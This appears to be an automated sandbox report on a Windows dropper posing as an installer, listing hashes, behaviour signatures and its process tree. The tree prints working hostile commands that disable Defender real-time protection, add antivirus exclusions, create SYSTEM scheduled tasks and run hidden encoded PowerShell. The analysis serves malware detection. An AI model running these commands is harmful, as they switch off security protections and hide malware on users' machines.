Analysis
-
max time kernel
238s -
max time network
239s -
platform
windows7_x64 -
resource
win7-20240508-en -
resource tags
-
submitted
13-06-2024 23:25
General
-
Target
81b163400735867fc4a1d039ea5fcc0fb65a026779ec851229c030d444dab097.exe
-
Size
7.2MB
-
MD5
2eb2965c8e9262809fd739777a8a7465
-
SHA1
c8811f8484e30b847a54c252c9fb6e19438baa72
-
SHA256
81b163400735867fc4a1d039ea5fcc0fb65a026779ec851229c030d444dab097
-
SHA512
6487a579de0d74be23e51b2ad171e0bac6c0ccf169ad8f0587d9607680e0a79d7c4c73840ed6b361b9f21ff820feace8da46bf59b60d30e4aef6a5e507342d14
-
SSDEEP
196608:91OzUm23mnIvt/e3nLymI5R7gs0kS4rC6Qh5dt:3Oil/e3nL4nU8Clz
Score
10/10
Malware Config
Signatures
-
Modifies Windows Defender Real-time Protection settings 3 TTPs 8 IoCs
-
Windows security bypass 2 TTPs 40 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 16 IoCs
Run Powershell and hide display window.
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
-
Executes dropped EXE 6 IoCs
-
Loads dropped DLL 29 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 2 IoCs
-
Drops file in System32 directory 27 IoCs
-
Drops file in Program Files directory 24 IoCs
-
Drops file in Windows directory 6 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 5 IoCs
-
Creates scheduled task(s) 1 TTPs 21 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates system info in registry 2 TTPs 4 IoCs
-
Modifies data under HKEY_USERS 64 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\81b163400735867fc4a1d039ea5fcc0fb65a026779ec851229c030d444dab097.exe"C:\Users\Admin\AppData\Local\Temp\81b163400735867fc4a1d039ea5fcc0fb65a026779ec851229c030d444dab097.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS1758.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS195A.tmp\Install.exe.\Install.exe /PHpBdidFfjQ "525403" /S3⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Loads dropped DLL
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 66⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 67⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 66⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 67⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"5⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 66⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 67⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"5⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 66⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 67⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"5⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force6⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force7⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force8⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True7⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bcicWGWSPuqTxjDSpV" /SC once /ST 23:27:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\eqfCDMxNLExrjrYoz\YZZOhqeJLJasQiW\KVPDPJQ.exe\" Yw /dXqdidSHVt 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bcicWGWSPuqTxjDSpV"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C schtasks /run /I /tn bcicWGWSPuqTxjDSpV5⤵
-
\??\c:\windows\SysWOW64\schtasks.exeschtasks /run /I /tn bcicWGWSPuqTxjDSpV6⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1056 -s 6004⤵
- Loads dropped DLL
- Program crash
-
C:\Windows\system32\taskeng.exetaskeng.exe {79AB0079-A1EA-43C9-8AF4-3A8BA05FD206} S-1-5-18:NT AUTHORITY\System:Service:1⤵
-
C:\Users\Admin\AppData\Local\Temp\eqfCDMxNLExrjrYoz\YZZOhqeJLJasQiW\KVPDPJQ.exeC:\Users\Admin\AppData\Local\Temp\eqfCDMxNLExrjrYoz\YZZOhqeJLJasQiW\KVPDPJQ.exe Yw /dXqdidSHVt 525403 /S2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 66⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 66⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 66⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 66⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force7⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gAnzrjjZd" /SC once /ST 18:13:39 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gAnzrjjZd"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gAnzrjjZd"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:324⤵
- Modifies Windows Defender Real-time Protection settings
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:644⤵
- Modifies Windows Defender Real-time Protection settings
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "glLWFNdBr" /SC once /ST 16:48:23 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "glLWFNdBr"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "glLWFNdBr"3⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True6⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HKomOEKiubDeyUja" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HKomOEKiubDeyUja" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HKomOEKiubDeyUja" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HKomOEKiubDeyUja" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HKomOEKiubDeyUja" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HKomOEKiubDeyUja" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HKomOEKiubDeyUja" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HKomOEKiubDeyUja" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\cmd.execmd /C copy nul "C:\Windows\Temp\HKomOEKiubDeyUja\QjBGemcZ\BTtVRRRMElXfBbVa.wsf"3⤵
-
C:\Windows\SysWOW64\wscript.exewscript "C:\Windows\Temp\HKomOEKiubDeyUja\QjBGemcZ\BTtVRRRMElXfBbVa.wsf"3⤵
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YrgxaRmWgsNWPaiiAzR" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YrgxaRmWgsNWPaiiAzR" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hkBthRLftwjEC" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hkBthRLftwjEC" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oGdIbQIKIHUn" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oGdIbQIKIHUn" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\prAQyJMeU" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\prAQyJMeU" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zNBDoCPwUgCU2" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zNBDoCPwUgCU2" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\wpmocubwzvTKZWVB" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\wpmocubwzvTKZWVB" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\eqfCDMxNLExrjrYoz" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\eqfCDMxNLExrjrYoz" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HKomOEKiubDeyUja" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HKomOEKiubDeyUja" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YrgxaRmWgsNWPaiiAzR" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YrgxaRmWgsNWPaiiAzR" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hkBthRLftwjEC" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hkBthRLftwjEC" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oGdIbQIKIHUn" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oGdIbQIKIHUn" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\prAQyJMeU" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\prAQyJMeU" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zNBDoCPwUgCU2" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zNBDoCPwUgCU2" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\wpmocubwzvTKZWVB" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\wpmocubwzvTKZWVB" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\eqfCDMxNLExrjrYoz" /t REG_DWORD /d 0 /reg:324⤵
-
